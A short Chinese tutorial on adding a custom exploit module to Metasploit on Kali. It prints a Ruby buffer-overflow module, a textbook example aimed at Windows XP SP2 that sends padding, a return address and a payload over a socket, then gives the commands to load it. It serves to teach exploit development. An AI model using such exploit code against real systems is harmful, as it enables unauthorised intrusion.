給kali的metasploit下新增一個新的exploit
- 首先在/usr/share/metasploit-framework/modules/exploits/目錄下新建一個自定義資料夾,例如fwdtest
- 仿造exploits目錄下的其他exp(rb檔案)編寫自己的exp.rb指令碼(這邊用0day安全:軟體漏洞分析技術裡的一個栗子)
-
[email protected]:/usr/share/metasploit-framework/modules/exploits/fwdtest# ls -
0day1.rb -
[email protected]:/usr/share/metasploit-framework/modules/exploits/fwdtest# cat 0day1.rb -
## -
# This module requires Metasploit: http//metasploit.com/download -
# Current source: https://github.com/rapid7/metasploit-framework -
## -
require 'msf/core' -
class Metasploit3 < Msf::Exploit::Remote -
include Msf::Exploit::Remote::Ftp -
def initialize(info = {}) -
super(update_info(info, -
'Name' => 'security test', -
'Description' => %q{ -
This module exploits a buffer overflow. -
}, -
'Author' => 'fwd', -
'License' => MSF_LICENSE, -
'Privileged' => true, -
'Payload' => -
{ -
'Space' => 300, -
'BadChars' => "\x00", -
}, -
'Platform' => 'win', -
'Targets' => -
[ -
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x7c809f83 } ], -
])) -
end -
def exploit -
connect -
attack_buf = 'a'*200 -
attack_buf += [target.ret].pack('V') -
attack_buf += payload.encoded -
sock.put(attack_buf) -
handler -
disconnect -
end -
end -
[email protected]:/usr/share/metasploit-framework/modules/exploits/fwdtest#
- 在控制檯下啟動metasploit
- 在msf提示符下輸入reload_all重新載入所有模組
- 在msf提示符下輸入use exploit/fwdtest/exp(輸入的時候可以用tab補全,如果不能補全說明就有問題)
